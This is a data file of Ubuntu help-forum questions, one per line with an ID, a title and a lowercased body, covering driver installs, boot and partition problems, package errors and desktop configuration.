522105	how to quick select which access point ( or bssid ) to use for a given wireless network ( aka ssid ) ?	i use networkmanager with a wlan that has two access points ( same ssid ) . is there a quick way to switch between auto selection force to connect to one specific access point force usage of the other access point command line solution is also fine ( as long as networkmanager can keep managing the device ) . edit : some people think i can easily configure different entries and select between those . this is not true : even with two entries ( with fixed bssid each ) with different names ( but same ssid ) , the menu only presents one entry ( with the name of the ssid ) without indicating bssid or name of the corresponding trusted entry .
522108	error while setting up mpd & sonata ... i am stumped	i 've tried and tried and re-tried installing mpd and sonata on ubuntugnome 14.04 following this guide and this one . the last time i tried , i got to the stage where the user starts mpd by typing 'mpd ' in the terminal ( following the first guide ) , but in response to this i get : socket : failed to bind to ' [ : : ] :6600 ' : address already in use which i assume is part of my issue . i really want to get this working but i 've just reached the end of my understanding . what can i try to work around this ? thanks .
522111	unable to play video	im new in ubuntu . i 've installed ubuntu 14.04 lts . whenever , i try to play video , i get message to install gstreamer1.0-libav . if i click install , then it gives me the following error . the following packages have unmet dependencies : gstreamer1.0-libav : depends : libavcodec-extra-54 ( > = 6:9.13 ) but 6:9.16-0ubuntu0.14.04.1 is to be installed depends : libavformat54 ( > = 6:9.1-1 ) but 6:9.16-0ubuntu0.14.04.1 is to be installed depends : libavutil52 ( > = 6:9.1-1 ) but 7:2.3.3-0ppa1~trusty is to be installed depends : libc6 ( > = 2.14 ) but 2.19-0ubuntu6.3 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed
522112	nvidia driver 14.04 install fails	i recently installed ubuntu 14.04 lts on a dell inspiron 9300 with a new hd . was working reasonably well , but was getting a 'black screen of death ' with messages about problems with the nouveau driver and the nvidia card . my dell has the nvidia geforce go 6800 v84.30 . the dell is running with bios a04 -- i have not found a linux version of the a05 bios - only windows i downloaded and tried to install a driver from nvidia , nvidia-linux-x86-185.18.36.pkg1.run . part of the pre-install had the nouveau driver put in a 'blacklist ' . the actual install fails with messages about kernel configuration : - > the distribution-provided pre-install script failed ! continue installation anyway ? ( answer : yes ) - > no precompiled kernel interface was found to match your kernel ; would you li ke the installer to attempt to download a kernel interface for your kernel f rom the nvidia ftp site ( ftp : //download.nvidia.com ) ? ( answer : yes ) - > no matching precompiled kernel interface was found on the nvidia ftp site ; this means that the installer will need to compile a kernel interface for your kernel . - > performing cc sanity check with cc= '' cc '' . - > performing cc version check with cc= '' cc '' . error : the kernel header file '/lib/modules/3.13.0-35-generic/build/include/linux/version.h ' does not exist . the most likely reason for this is that the kernel source files in '/lib/modules/3.13.0-35-generic/build ' have not been configured . i have searched around and found suggestions for different packages - nothing makes any difference - i get the same error . the system does work-kinda . very slow and i get messages about running graphics thru the cpu rather than the graphics card . i have worked with linux before , but this is my first personal physical linux laptop -- mostly used vm 's on top of windows for work . suggestions ? please be detailed and not assume i know squat .
522113	install intel centrino wireless controller firmeware in linux-libre	i have the following wireless network controller : 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2200 [ 8086:0891 ] ( rev c4 ) subsystem : intel corporation centrino wireless-n 2200 bgn [ 8086:4222 ] kernel driver in use : iwlwifi it works well on ubuntu 14.04.1 lts . but if i want to use a linux-libre as kernel , it fails due to lack of related firmware on linux-libre . how can i install the firmware ?
522114	ca n't get rid of gpg-error : http : //download.opensuse.org	i have been googling for hours trying to find a way to get rid of the annoying gpg-error referring to the link below . w : gpg error : http : //download.opensuse.org release : the following signatures could not be verified because the public key is not available : no_pubkey 9a5eed8cbca00d90 i have tried : sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 9a5eed8cbca00d90 but to no avail . google translated error message : the following signatures could not be verified because the public key is not available
522115	how does the package update process work/happen at canonical/ubuntu ?	after trying to look through this site and also searching for an answer , there seems to be no clear information concerning how this process is done . what i would like to know is how the folks at canonical/ubuntu/volunteers do their package update/maintenance process ? is there a group of people literally just spending their days installing and testing packages until they break ? if yes : do these people mostly work for canonical ? are they called qa-testers/testers ? what is their workflow ? ( like what work processes do they follow , question can be ignored or asked to be removed if irrelevant ) are volunteers allowed to assist in package testing ? i 'm interested in how this is done , as there must be thousands of packages out there and testing them can be both straining and might also lead to `` slip-ups '' .
522116	chroot question	i am wondering if there is anyone out there that can explain an error that happens when i try to use debootstrap . sudo debootstrap -- arch i386 wheezy /srv/chroot/wheezy http : //http.debian.net/debian mknod : `/srv/chroot/wheezy/test-dev-null ' : operation not permitted e : can not install into target '/srv/chroot/wheezy ' mounted with noexec or nodev
522121	download packages ( different architecture ) different ubuntu version	ideally , i would like to specify architecture and ubuntu version and download all dependencies for that package , then take them to another computer . i know about apt-get download ... . and that would work fine if the architectures and versions matched . i do see an architecture modifier , but not a version modifier . any help , or pointing me toward how to accomplish this with aptitude or another package tool would be appreciated . even if i could take one .deb to the target computer and list all concrete dependencies ... that would really solve the problem .
522122	how to setup a ubuntu raid to be accessed by the domain active directory server	i 'm new to this . i have setup a ubuntu 12.04 server on a dell poweredge fs-12 . i have setup a large area on the fs-12 ( raid 50 ) to replace one of the drive mappings on the windows 2003 server . i would like to change the mapping to access the new location i created on the ubuntu server , but still continue using the windows 2003 server active directory setup for the domain . i have only installed ubuntu 12.04 and formatted the new space . i currently have it mounted /dev/sdb1 to /media/shared . what do i need to install or setup to allow the windows clients to access the new space using the windows2003 server permission on the domain ? please help . thank you - jeremy
522123	how to retrieve sound from a turntable via usb	i have a turntable which has a usb made for digitalizing vinyl records via usb ( usb a to usb b not audio to usb ) . it came with a disk that had `` ez vinyl/tape archiver '' which requires itunes to run . what program can receive audio data and record it ?
522125	gedit : plugin `` imitation '' does n't work after upgrade to ubuntu 14.04	unfortunately , i ca n't use the gedit plugins called imitation and `` regex search and replace '' after upgrading from 12.04 to 14.04 . anyone could help me , please ? i already ran : sudo apt-get install gir1.2-gtksource-3.0 sudo chown peter /home/peter/.config/gedit
522128	update to 14.04 failed	on sunday i attempted to update my system to the trusty tahr ( 14.04 ) version . after taking over 14 hours the update had stalled and the computer was locked so i shut it off . upon reboot i could not launch gnome , but could launch windowmaker ( my normal ) . from there i followed the steps by eric lambart in how do i resume a release upgrade/update ? which worked fine . but the system was not upgraded yet . so i attempted to restart the upgrade using `` sudo apt-get install -f '' . each of these steps took maybe 10 minutes . i then restarted my system and now boot into a command prompt with `` initramfs '' . i have no idea what to do from here . can anyone please help ? thanks .
522129	flickering screen ubuntu 14.04	unable to resolve the issue of flickering screen which seems to appear after about an hour of logging in . my graphic card is an integrated one : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 )
522130	remote desktop from ubuntu 14.04 to windows 7 black screen	i am experiencing problem when connecting to remote desktop from my ubuntu 14.04 to windows 7 . previously i had no issues connecting to my computers ( one win7 on desktop and other vista laptop ) . however i have upgraded laptop from vista to win7 and now when i try to connect from ubuntu most of the time i get black screen using either vncviewer or default ubuntu remote desktop viewer or krdc . sometimes it renders me remote desktop but it loads very slowly and is unresponsive . interesting thing is that i have no difficulties connecting to desktop pc running win7 as well . i tried to follow this guide but with no luck so i concluded issue is with ubuntu : https : //support.realvnc.com/knowledgebase/article/view/277/6/im-getting-a-black-screen-when-i-connect-to-vnc-server both win7 machines are 64bit , newest version of realvnc server . my ubuntu laptop is ubuntu 14.04 64bit , with intel® core™ i7-3537u cpu @ 2.00ghz × 4 and intelhd 4000 gpu . i thought that problem is with gpu but i am confused now as mentioned above i can connect to other win7 machine without any difficulties and i was able to connect to the problematic one prior upgrading to win7 when it was running win vista . i tried to connect to the problematic win7 laptop from my laptop using win8 and from other pc running win and had no difficulties as well . have anyone experienced something similar ? thank you
522133	cdrom/dvd not working	i recently updated and the updater had me upgrade from ubuntu12.10 to 14.04 lts . now i cant play cd 's dvd 's or even get it to recognize a disk at all . any suggestions ?
522136	touchpad does not owrk in hp pavilion x2 tablet	i just installed the last version of ubuntu 64 bits in this tablet that had the windows 8 . all seems alright including the toucscreen but the touchpad does not work . how to solve this ? i tried to follow the commands suggested in other posts about synaptic toucpad but it did not solve the problem . can anyone help me ? thank you .
522138	how to show all workspaces in one screen ? ( mate environment )	am i able to see all workspaces in one screen using the mate desktop environment ? if i can , how ? i have compiz installed so if its posible to configure compiz in a way to be able to do this that will also help , but i prefer not to use compiz . thanks in advance !
522139	is it possible to install ubuntu on external disks from an active workstation ?	i am running ubuntu on my workstation and have connected three blank drives to it . i would like to install three copies of ubuntu onto the blank drives while continuing to work in my operating system . essentially i 'd like to write a 'base image ' of ubuntu to the blank disks , so that i can then place them into waiting workstations and power them on . i would expect most hardware to be autodetected upon boot , and i would also expect to be prompted to create a user account and set the hostnames on each one . in the windows world this would be called `` writing a wim '' to a disk using a tool such as imagex . so i found this page and the last item in this section looked promising , but the resulting link is very dubious ( suggesting to use unetbootin and 'crossing fingers ' ) and the result is to still manually run the installer if the finger-crossing incantation was effective : -/ is there a documented method to fully extract the base system image onto a waiting disk so that it just boots up and runs ? i suppose what i am asking for is similar to downloading a pre-built virtual machine and dumping it onto a physical disk . if anyone is familiar with the fog project , i suppose what i 'm asking for is to do what they do with windows , but with linux ( although i 'd prefer to just extract the image from an official iso rather than deploying it and capturing the partition . )
522141	how can i get the ăźnstall ubuntu besides windows`option in the installation process ?	when i try to install ubuntu ( 14.04 ) i do n't see the option -ăźnstall besides windows..- i have a couple of apps . that requiere windows then i ca n't `` forget it '' completely ... i 'll appreciate your answers to fix this issue . ( i 'm using a usb bootable drive )
522145	ubuntu horriblely slow	i ran ubuntu on my computer for the first time . it was like a slug carrying 5 snails and the slug had a limp and the slug was swimming in molasses . it took about 10 seconds to minimize the program . how do i make ubuntu faster ?
522147	get top 10 processes by network usage	the past 2 nights , my ubuntu server had strange jumps in resource usage and everyone connected to it get a `` software caused connection abort '' error and ca n't connect for about 5 min due to being timed out . but after 5 min , everything goes back to normal . i have already created a cron job that logs the top 10 processes by cpu usage and memory usage every 5 minutes , but i would also like to log the top 10 by network usage . i tried using nethogs , but whet i redirect output to file , the file ends up with a lot of hardly readable gibberish . is there an alternative ? maybe there is an easier way to do this ? edit : here is the command i an using : nethogs venet0:0 > > out.txt
522151	please assist with partition management- can not reformat drive to install windows ?	i installed ubuntu 14.04 onto my drive , and am now trying to install windows . ideally , i would like to just completely wipe the drive and remove all partitions , so i am working with a blank slate , as it will be easier to install a dual boot with windows and then linux . i tried to reformat the largest partition of my drive to ntfs so i could install windows ( using gparted ) , but was given the message '' you are formatting over non-empty lvm2 physical volume /dev/sda3 deleting or overwriting the physical volume is irrecoverable and will damage or destroy the volume group '' it advises me to use lvm to free physical volume before attempting to reformat . now here 's the question : how would i safely free the volume up in lvm so that i can reformat with gparted ? or , if the ultimate goal is to erase all partitions and format the drive for ntfs , would it be better to just forcibly reformat ? could this cause physical damage to my drive ? sorry for the noobery , i am in way over my head here and i do n't want to wreck my drive or something . can give more information as needed .
522152	bash script transition to qt ubuntu sdk	i 've a script in bash that i would like to write in ubuntu sdk qteditor : sudo su echo $ passwd sudo cp -rf ./livewave-master ~/tmp/livewave cd ~/livewave sudo chmod +x update_xpto.sh echo $ passwd i= '' 0 '' while [ $ i -lt 15 ] do sleep 1s i= $ [ $ i+1 ] printf `` . '' done sudo rm /tmp/livewave-master.tgz sudo apt-get clean sudo apt-get autoremove clear
522153	error installing ubuntu 14.04 dual boot with windows 7 ultimate on acer aspire one laptop	i tried installing ubuntu via wubi.exe on my laptop but could not boot to ubuntu . instead i get these errors below ( see images ) : no wubildr gnu grub what went wrong ? please see there are other images on my comment .
522154	dvd does not boot all the way ?	i do not have a hdd in my laptop which is a acer aspire 5750g-6480 so i bought a ubuntu 14.04 iso dvd all is well with disk but when i try to boot i get as far as a purple screen with a keyboard and a stick man then it asks what language then i get to try ubuntu with out installing i click that and ... . ! ! ! ! ! ... . nothing help i have to gray hairs left and im going to pull then out oh by the way i have been using puppy linux with no problems and i have ran fat dog linux with no problem both on this computer and both off of live disks
522155	how do i run python code in ubuntu 14.04	i 'm learning python so i may get my foot in the door for a programming career . i 'm using the gedit text editor to write the code , however i do n't know how to execute the code on ubuntu . if anyone is able to help , i would greatly appreciate as much help as i 'm able to get .
522156	how to make terminal one desktop and unity another	i am running ubuntu 14.10 on my compaq presario laptop with a dual monitor setup . i would like to have unity on my larger screen and a full screen terminal on the laptop screen . is this possible ?
522157	resizing second drive partition	i have struggled with my problem for days , and have tried to find different kind of solutions , but now i decided to ask . my primary problem is too small sda1 partition which is 243m and 100 % full . sda2 which includes sda5 is the rest 148.8g gparted booted from usb shows that sda5 is full , thus wo n't let to decrease it 's size . however the sda5 uses really only about 21g , showing 14 % when using # df -h i have extra drive ( 80g ) where i installed another ubuntu , and i have mounted the old sda5 to get files from there . now my secondary problem is , that i ca n't find out how to resize the original sda5 from terminal . i think it can be done because it really is n't full ( as gparted thinks it is ) , and it does n't have to be mounted because it 's secondary drive when the machine is booted from extra drive . i ca n't get some info ( like df -h ) from the original drive , because the machine is and has to be booted from secondary right now , but i will do my best to get as much extra info as possible . thank you in advance ! additional info : the primary disk i 'm trying to get to work is ubuntu server 12.04 the secondary disk is using ubuntu 14.04 primary disk 's sda5 is lvm
522158	ca n't install matlab 2014a on ubuntu 14.04	when i run the installation file , the terminal shows me the following : preparing installation files ... installing ... /tmp/mathworks_5699/sys/java/jre/glnxa64/jre/bin/java : 4 : /tmp/mathworks_5699/sys/java/jre/glnxa64/jre/bin/java : syntax error : unterminated quoted string finished i would really appreciate any help on this .
522159	i ca n't install captiva icon theme in ubuntu 12.04	i use the commands in the terminal for install it and it does n't works pls help . this are the commands : sudo add-apt-repository ppa : captiva/ppa sudo apt-get update & & sudo apt-get install captiva-icon-theme . help !
522166	ca n't find ubuntu software center	i 'm a ubuntu newbie . have a dell chromebook 11 . last night i downloaded crouton and ubuntu 13.10 & since i 've downloaded ubuntu , i have n't even been able to find the software center so i could download other apps . did i download ubuntu wrong or something ? i 'm able to switch between the two operating systems ( chromeos & ubuntu ) but i ca n't do anything on ubuntu that i want to ( like download things ) and i can only really browse the web . when i search for ubuntu in the terminal center ( just searching 'software-center ' in terminal ) , it says command not found . i do n't know what to do !
522170	ran out of space on disc ? still have 30gb free	i tried to install steam and ubuntu told me i only had a few megs left . but my partition says it has 30gb free . filesystem size used avail use % mounted on /dev/sdb5 6.9g 6.3g 236m 97 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.9g 12k 1.9g 1 % /dev tmpfs 396m 1.2m 395m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 89m 1.9g 5 % /run/shm none 100m 52k 100m 1 % /run/user /dev/sdb1 138g 130g 8.7g 94 % /media/randy/new volume /dev/sda1 75g 48g 27g 64 % /media/randy/f440b04040b00b7e
522172	dual monitor suddenly not working	i had dual monitors working fine on this machine for years . a few days ago , i had to borrow one of the monitors for another project . when i brought it back and plugged it in , it did n't work . ubuntu sees the second dvi port a disconnected . what 's weird is that each one works individually . i have a dual dvi card . we 'll call them ports a + b. i have two dvi cords hooked up to separate monitors , we 'll call them 1 + 2 . when 1 is plugged into a , it does n't works . when plugged into b it does . when 2 is plugged into a or b , it works fine . only 1 will work when both plugged into either configuration . i thought maybe it was the video card , so i bought a new one . the exact same thing happens with the new card . what 's up with this ? how do i troubleshoot it ?
522174	ubuntu 14.04.1 64 bit running so slow on new hp laptop	i just purchased a hp 15 notebook pc running amd a8 processor 4gig ram windows 8.1 ran like the wind . ubuntu is so slow it hangs every now and then ... any answers for me . merle swain
522175	ubuntu 14.04 suddenly wo n't boot	i ran into a really odd problem today . i tried to boot my ubuntu partition , and i got a flashing screen that showed only black with a mouse cursor . eventually it said restoring resolver state , and something about saned . i got that message to go away by uninstalling sane-utils . but now it just flashes the screen at me occasionally with a mouse cursor . i ran boot-repair to create this log http : //paste.ubuntu.com/8304401/ . was wondering if anyone had any ideas ? i heard someone mention it might be my graphics drivers after an update , but not for sure . if you need info just let me know what .
522176	xubntu 14.04 partial update hangs on boot	i did a partial update on my xubuntu 14.04 desktop box . when i boot up , it hangs at the `` checking disk drive for errors , '' screen . i am able to ssh into the machine , but i have no idea what to do from here .
522177	intel/amd hybrid graphics on ubuntu 14.04	i recently acquired a new laptop featuring hybrid graphics , namely a toshiba p50t-b . i installed ubuntu and at first i had lots of troubles to set up the graphics . the screen was turning black right after grub , which was fixed through adding the option nomodeset and by installing the intel drivers . now , the intel gpu works just fine as an only graphics controller , but i can not get the amd radeon r9 m265x to work . i tried installing the proprietary drivers fglrx which cause the system to boot in low graphics mode from which the farthest i have gone is to switch to console mode and uninstall/purge the amd drivers . the relevant part of the output of sudo lshw is *-pci description : host bridge product : xeon e3-1200 v3/4th gen core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 06 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200 v3/4th gen core processor pci express x16 controller vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 06 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : e000 ( size=4096 ) memory : f7b00000-f7bfffff ioport : e0000000 ( size=268435456 ) *-display unclaimed description : display controller product : venus pro [ radeon hd 8850m / r9 m265x ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi cap_list configuration : latency=0 resources : memory : e0000000-efffffff memory : f7b00000-f7b3ffff ioport : e000 ( size=256 ) memory : f7b40000-f7b5ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:49 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) as you see , for some reason the intel graphics is being detected as a vga compatible controller whereas the amd gpu is being listed as display controller and , moreover , appears as unclaimed , which seems to mean that the necessary module for it to work is not loaded . as an additional info , the relevant part of the output of lspci is 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 display controller : advanced micro devices , inc. [ amd/ati ] venus pro [ radeon hd 8850m / r9 m265x ] unfortunately , toshiba 's support is terrible as they do not support anything but msw , so here i am stuck with a hybrid system which only works as a regular single-gpu laptop .
522178	update manager error	when i try to update ubuntu from the update manager i get this message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/mx.archive.ubuntu.com_ubuntu_dists_quantal_multiverse_binary-i386_packages , e : the package lists or status file could not be parsed or opened . what can i do ? p.s its my first time using ubuntu so i 'm kinda new around here
522181	wubi.exe is not in xubuntu 14.04 disks . can someone help me install xubuntu1404 with wubi	the wubi.exe is on the ubuntu 1404 disk , not on xubuntu1404 disk ; ( and when you launch it supports ubuntu , kubuntu , lubuntu ) , but ... doesnt support xubuntu . can anyone provide guidance ? thanks so much !
522183	dual boot / grub 2 issues ( ubuntu/windows )	tldr version : problems with grub2 . boots straight into grub terminal . i get some `` failure reading sector errors '' ( details below ) . i 've tried running boot repair several times , with a few different options checked at this point ( details below ) , but i ca n't get it to work . dual boot situation , was able to access windows when problem started , but now selecting windows brings me to a grub terminal as well . http : //paste.ubuntu.com/8298591 full details : i 've got some issues going on with my grub installation . i 'll detail what 's going on first , and then i 'll try and give the background of what 's been going on . yesterday evening , my ubuntu froze up on me and i had to perform a hard/manual shutdown of the computer . when i went to reboot , it was n't allowing me to boot into my grub screen ( i believe at the time i was getting the grub terminal , but i 'm not 100 % certain at this point anymore ) . anyways , this is n't the first time this has happened ( more on that later ) , so i went ahead and ran the boot repair tool . i had a few problems with it last time , but i figured i 'd try again anyways . first attempt , i got the notice that my pc was in legacy mode but i disregarded it , and proceeded to run the repair anyways in default mode . no luck . second attempt , i got my computer out of legacy mode , booted into ubuntu through the efi ( on a flash drive ) , and ran the repair again . default mode . it booted into the grub menu and it looked like it would work . i selected ubuntu , and i get a bunch of errors : error : failure reading sector 0x74706da0 from 'hd2 ' . error : failure reading sector 0x74706d00 from 'hd2 ' . error : failure reading sector 0x0 from 'hd2 ' . error : failure reading sector 0x74706da0 from 'hd2 ' . error : failure reading sector 0x74706d00 from 'hd2 ' . error : failure reading sector 0x0 from 'hd2 ' . error : no such device : 4c536822-6b4d-4c08-88e3-2694bc7cd0be . after that , it takes me to the grub prompt where i just get the standard : grub > interesting to me , i have 2 options in the efi/bios for linux ( not including the usb option ) , and a windows option as well . it does not matter at all which option i take ( less the usb ) , i always end up at the grub terminal - even if i select windows . i 've tried the backup and rename windows efi option as well ( sort of blindly , primarily because it was one i could simply set back if it did n't change anything ) . it did n't change a thing . fwiw , at one point this evening , i was still able to boot into windows while linux was unavailable . the history of this problem is that it just did a similar thing just over a week ago . i fixed it with the boot repair tool , with the default settings . however , when i did fix it , i was n't able to boot into linux with the efi . i had to go through in legacy mode , which i suspect was a problem that i created . i think i probably booted into legacy mode and ran the repair from there , but i 'm not quite certain at this point . both times i 've had these problems it came after a unplanned hard shutdown - power once & frozen os the second time . here 's a boot repair log that i just generated with the most recent changes represented . http : //paste.ubuntu.com/8298591/ my initial thought with all of the disk access errors would tell me that i might have a disk problem , and particularly since i had a similar issue just about a week ago . however , i 'm fairly certain i 've got an issue with the actual efi on hd1 right now , due to the fact that i ca n't even get into windows - and with my limited knowledge of efis , i do n't really think that can be tied to each other ... but i do n't know - hopefully someone can tell me ! : ) thanks for reading and thanks in advance for any help you might be able to provide . kind regards .
522184	when i leave my laptop lid open , how do i may it so that it does n't suspend ?	it just keeps blackening out when i 'm afk for 10 minutes or so . how can i stop that ?
522185	ubuntu freezes when nvidia driver is used	i just installed ubuntu 14.04 lts and when i check the nvidia driver ( proprietary , tested ) on additional drivers , my system freezes very often ( keyboard and mouse both freeze ) , but when nouveau driver is checked the system works just fine , no freeze at all . any suggestions ? solutions ? i really want to use my nvidia gpu : ( info : asus k46cb intel core i5-3337u cpu @ 1.80ghz ă 4 nvidia geforce 720m 6 gib memory 1 tb disk
522187	ubuntu touch on lg optimus g e975	i have lg optimus g e975 . i rooted it and now i have installed cyanogen-mod . i am not using phone like a phone , i 'm using phone just for skype , internet search , mail and other stuff ... do i need to install ubuntu touch ? if i do - where can i find a stable working release ? p.s . : official wiki is old ? 6 month ago was updated forum on xda . https : //wiki.ubuntu.com/touch/devices http : //forum.xda-developers.com/showthread.php ? t=2600702 & highlight=ubuntu+touch
522192	installing applications onto external sd card ?	i recently bought a c720 chromebook and have since put ubuntu on it . the only problem i have so far is the limited amount of disk space left on the ssd . i was wondering if it 'd be possible to install apps onto an sd card or usb drive maybe even an external hard drive and run the files from there . i read into symlinks but i do n't really know where to start with those , at the moment i 'm trying to install skype and steam onto my sd card without taking up the remaining space on my ssd .
522195	installing 14.04 , getting `` ? ? ? '' error	windows user here trying to install ubuntu onto a laptop that has no operating system to speak of . i got an external hard drive setup and it boots to live okay . however , when i run the installer , it gives me a popup with a bunch of question marks and will not let me continue the installation ( or exit the popup ) . it occurs right around where you pick what timezone you 're in , just after you hit the `` install now '' button on the options menu where you select whether you want to erase all partitions or do your own thing . i have never seen this error before , so i kind of freaked and came here haha ! if there is a duplicate ( which i do n't think there is ) , i apologize . thank you !
522197	zotac zbox en760 wo n't boot from usb	i wanted to install ubuntu 14.04.1 on my zotac zbox en760 . it is using legacy boot , as both the `` win7 uefi '' and `` win8 uefi '' do n't get past the purple screen ( do n't know the official name , the one with the `` keyboard = accessibility man '' ) . after this , it leaves me with this message : specs i5-4200u , 8gb ram , geforce gtx 860m , 1tb hdd i 'll update this post to see if using older versions of ubuntu are able to boot , or if the windows installer works better . edit 1 : 12.04.4 and 14.04.1 do n't work , and reproduce the same problem . i 'd appreciate any help . edit 2 : well , steam os works out of the box . i would still like to be able to install ubuntu rather than steam os though . edit 3 : huh . disabling pxe rom functionality seemed to fix the problem completely , allowing me to get to unity . i 'll see how it handles a dual-boot with windows . edit 4 : the ppa provided at this website works very , very well and provides the latest proprietary drivers , at the current time of writing 340 . instead of graphics information , the driver being used for the display reads as the board type ( gmk107 , i think ) . i 'm gon na go play some games now ! feel free to message or comment on this question , and i 'll get back to you asap . anyway , as a gaming box , this thing screams at any games you throw at it . highly recommend .
522198	create a manifest of the home folder ?	i want to create a file manifest ( list of file/folder names , directory structure , and file metadata ) of my home folder . i do not want the actual content of the files to be saved . how can this be done ( preferrably without the terminal ) ?
522205	do i need to install anything else ?	i am a new linux user i just swapped over from windows . well rather i 'm dual booting but plan to use ubuntu as my primary os from now on . i just installed python 2.7.8 and in the thread that i read the instructions from the poster said that it was required that i install some dependencies . however , python runs fine and i have n't installed anything else . i was wondering if this was just an older thing as the thread was installing python 2.7.5 on an older version of ubuntu ( i am using 14.04 lts ) . i 'll link the other thread below . if anyone can tell me why he installed the dependencies and if i need them that would be great . thanks in advance for any help . to clarify i was looking for anything that i needed to install before i could use python 2.7.8 without issues , but this was before i learned that a version of python shipped with ubuntu . so i now have python 2.7.8 and python 3.4 ( although my computer only shows python 3.4 in the software center ) as long as it is ok to have two different installs of different versions of python without any drastic issues then i 'm fine . i was just wondering if there was anything else that needed to be installed for them to work properly . how do i install python 2.7.2 on ubuntu ?
522211	can i remove cpp from ubuntu without causing any issues ?	i have a c++ compiler installed on a ubuntu server i am using as a lamp stack . will it cause issues for me to remove c++ ?
522212	computer wo n't boot to a windows 8 iso usb	i have a problem i installed ubuntu without making a partition , so i deleted windows from my computer.i whant to go back to w8 , but after making a boot usb in other computer with i plug it on my netbook and on the boot options only gives me the option to boot into ubuntu , without saying abything about my usb . can someone please help me ?
522213	graphical error while installing	i am relatively new to ubuntu and even newer to this community . ubuntu refuses to install and the screen goes nuts . let me lay out a list of what happens . boot off usb and see grub boot menu with install or try ubuntu . click any option to load . purplish screen comes up loading ubuntu . screen goes weird colors , blank , or stripped . nothing else happens . list of what i tried . vga vs dvi cord nomodeset or modeset=0 fb=false tried same usb worked fine on intel dell inspiron laptop , but want it on my desktop . i have a friend with an amd apu , but he has a gpu also , so it worked no problem for him . do i need a gpu for my amd to work ? specs no dedicated gpu just integrated . amd a4-5400k fm2 motherboard rose will 5.1 surround card rose will dual band 900 wifi card wd blue terabyte hard drive kingston ram 8gig 1600hertz
522214	why touchpad-indicator not work in asus x405j , and there is not touchpad option in ubuntu setting	im using ubuntu 14.04 lts on asus x450jf , i can not found touchpad setting like in picture . and then im trying to install : sudo add-apt-repository ppa : atareao/atareao sudo apt-get update sudo apt-get install touchpad-indicator its not change anything . in the fact , touchpad-indicator looks likely not work too , since the indicator is in cross icon . screenshoot : i was read few question about ubunutu touchpad not working well in asus x series , somebody can help me ?
522220	how to install gcc-4.6 ( 4.6.3-1ubuntu5 ) source package	i have recently started working on ubuntu and i have been facing a lot of difficulties installing programs in it . i do n't know how i managed to install netbeans and java jdk and jre . unfortunately the netbeans came without c++ compiler and debugger . i 've been googling for two days and all i could find and understand was some thing like this : sudo apt-get install build-essential sudo apt-get install gcc g++ sudo apt-get install gdb i finally -do n't know how- installed the compiler but still no debugger . then i start doing some crazy stuff . i purged gcc , g++ , gdb and not sure what else . anyway i downloaded the gcc-4.6 ( 4.6.3-1ubuntu5 ) source package from this link : http : //packages.ubuntu.com/source/precise/gcc-4.6 and as you may guess did n't know how to install it . so please any help would be greatly appreciated ^_^
522222	build android without default aosp app	i have removed some aosp apps from makefiles in /build/target/product . for example : removed deskclock/calendar etc but after rebuilding the android still i have find some apps like sound recorder/gmail2 etc.. can any one help me how to remove those apps . thank you ratna
522223	error detected while processing /home/kiran/.vimrc:	i m getting an error message when i am opening vi editor . the error message is here . kiran @ kiran-hp : ~/desktop $ vi hello.c error detected while processing /home/kiran/.vimrc : line 1 : e481 : no range allowed : $ set nocompatible line 2 : e481 : no range allowed : $ set backspace=2 press enter or type command to continue i 'm new to ubuntu and this terminal . please help .
522224	which tools are used for fuzzy neural network problems in ubuntu ?	hey i want to calculate problems related to fuzzy logics , neural networks , anfis , deep belif networks , restrictated boltzman machine etc . , so any one has idea which tools or gnu software applications will be more useful for these purpse ?
522225	ubuntu keeps returning to default after shutdown	hey guys i 'm completely new to ubuntu , i shut it down and when i got back on it , it had reset everything i had done including all my downloaded files back to default . not exactly sure whats going on . even from the terminal , my username that i chose during the installation does n't appear , it is ubuntu @ ubuntu . hope i can get this figured out . thanks for your time !
522227	ca n't use sudo , gedit , i 'm getting error in upgrading	sudo : unable to open /var/lib/sudo/username/7 : no such file or directory w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . i ca n't use gedit and sudo . i 'm was trying to edit the status file under /var/lib/dpkg but i failed to do so since it 's a read-only file . and having gedit as root does n't work . since i was trying to fix the problems because i ca n't upgrade . i badly need help . thanks in advance ! !
522230	charles breaks when run through a symlink	charles proxy is installed right now in /opt/charles . running /opt/charles/bin/charles starts charles successfully . now i want to add it to my path . ln -s /opt/charles/bin/charles /usr/local/bin/charles runs successfully and creates a soft link in my /usr/local/bin directory . however , when i run charles via /usr/local/bin/charles i get the error message : charles lib directory not found . looking in /usr/lib/charles-proxy . why does charles start successfully when run directly but not when run through the symlink ?
